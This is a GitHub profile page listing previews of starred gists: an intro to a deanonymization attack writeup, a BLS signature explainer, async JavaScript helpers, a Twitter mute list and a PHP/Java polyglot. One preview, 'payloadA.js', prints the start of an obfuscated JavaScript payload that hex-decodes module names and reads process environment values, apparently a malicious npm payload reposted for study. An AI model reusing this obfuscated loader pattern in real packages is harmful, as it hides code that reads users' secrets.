Skip to content

Instantly share code, notes, and snippets.

View kumavis's full-sized avatar
🐉
!

kumavis kumavis

🐉
!
1.4k followers · 1.7k following
View GitHub Profile
@hackermondev
hackermondev / research.md
Last active March 11, 2025 23:10
Unique 0-click deanonymization attack targeting Signal, Discord and hundreds of platform

hi, i'm daniel. i'm a 15-year-old high school junior. in my free time, i hack billion dollar companies and build cool stuff.

3 months ago, I discovered a unique 0-click deanonymization attack that allows an attacker to grab the location of any target within a 250 mile radius. With a vulnerable app installed on a target's phone (or as a background application on their laptop), an attacker can send a malicious payload and deanonymize you within seconds--and you wouldn't even know.

I'm publishing this writeup and research as a warning, especially for journalists, activists, and hackers, about this type of undetectable attack. Hundreds of applications are vulnerable, including some of the most popular apps in the world: Signal, Discord, Twitter/X, and others. Here's how it works:

Cloudflare

By the numbers, Cloudflare is easily the most popular CDN on the market. It beats out competitors such as Sucuri, Amazon CloudFront, Akamai, and Fastly. In 2019, a major Cloudflare outage k

@wlib
wlib / LICENSE
Last active April 30, 2024 17:07
Run a shell script with bash, line-by-line, prompted on each command. Useful for running unknown scripts or debugging. Not a secure substitute for understanding a script beforehand.
MIT License
Copyright (c) 2021 Daniel Ethridge
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
@kriskowal
kriskowal / async-composition-2020.js
Last active January 19, 2021 06:03
function *count(n) {
for (let i = 0; i < n; i++) {
yield i;
}
}
const delay = ms => new Promise(resolve => setTimeout(resolve, ms));
const asyncForEach = async (values, callback) => {
@paulmillr
paulmillr / BLS_Signature.md
Last active February 12, 2025 15:27
BLS Signature for Busy People

BLS Signature for Busy People

Summary

  • BLS stands for

    • Barreto-Lynn-Scott: BLS12, a Pairing Friendly Elliptic Curve.
    • Boneh-Lynn-Shacham: A Signature Scheme.

  • Signature Aggregation

  • It is possible to verify n aggregate signatures on the same message with just 2 pairings instead of n+1.

@kriskowal
kriskowal / uber-to-agoric.md
Last active May 10, 2022 22:51
Uber to Agoric

I have a bit of good news and bad news. Friday, April 3, was my last day at Uber. Monday, April 6, was my first day at Agoric.

I started at Uber 5½ years ago, on the dispatch system. I joined Tom Croucher’s team, which focused on common frameworks for marketplace systems, with Jake Verbaten, Russ Frank, and spiritually Matthew Esch. When I arrived, the scaffolding and frameworks were in place. I wrote a tool for verifying that JSON schema evolution remained backward-compatible, did some weird stuff to automatically mix the middleware stack, and wrote a thing to balance load across Node.js processes more fairly than the Linux kernel. I don’t believe any of that work made it to production, really, but for those six months, I learned how to operate global dispatch while I was on-call for 24 hours once a month and developed a bald spot.

I then got on board a new Distributed Systems Group under Matt Ranney’s guidance and many of the folks I’ve been working with to this day. Matt had designed a DHT based on the S

@IanColdwater
IanColdwater / twittermute.txt
Last active February 23, 2025 18:09
Here are some terms to mute on Twitter to clean your timeline up a bit.
Mute these words in your settings here: https://twitter.com/settings/muted_keywords
ActivityTweet
generic_activity_highlights
generic_activity_momentsbreaking
RankedOrganicTweet
suggest_activity
suggest_activity_feed
suggest_activity_highlights
suggest_activity_tweet
@jsoverson
jsoverson / payloadA.js
Created November 26, 2018 19:29
! function() {
try {
var r = require,
t = process;
function e(r) {
return Buffer.from(r, "hex").toString()
}
var n = r(e("2e2f746573742f64617461")),
o = t[e(n[3])][e(n[4])];
@pipermerriam
pipermerriam / StringLib.sol
Created October 26, 2016 19:32
pragma solidity ^0.4.0;
library StringLib {
function concat(string storage _head, string _tail) returns (bool) {
bytes head = bytes(_head);
bytes memory tail = bytes(_tail);
for (uint i = 0; i < tail.length; i++) {
head.push(tail[i]);
}
@avafloww
avafloww / PhpJava.java
Last active February 18, 2025 13:14
This snippet of code is syntactically valid in both PHP and Java, and produces the same output in both.
/*<?php
//*/public class PhpJava { public static void main(String[] args) { System.out.printf("/*%s",
//\u000A\u002F\u002A
class PhpJava {
static function main() {
echo(//\u000A\u002A\u002F
"Hello World!");
}}
//\u000A\u002F\u002A
PhpJava::main();
@marick
marick / about_those_lava_lamps.md
Last active June 22, 2022 21:08
About Those Lava Lamps

Around 2006-2007, it was a bit of a fashion to hook lava lamps up to the build server. Normally, the green lava lamp would be on, but if the build failed, it would turn off and the red lava lamp would turn on.

By coincidence, I've actually met, about that time, (probably) the first person to hook up a lava lamp to a build server. It was Alberto Savoia, who'd founded a testing tools company (that did some very interesting things around generative testing that have basically never been noticed). Alberto had noticed that people did not react with any urgency when the build broke. They'd check in broken code and go off to something else, only reacting to the breakage they'd caused when some other programmer pulled the change and had problems.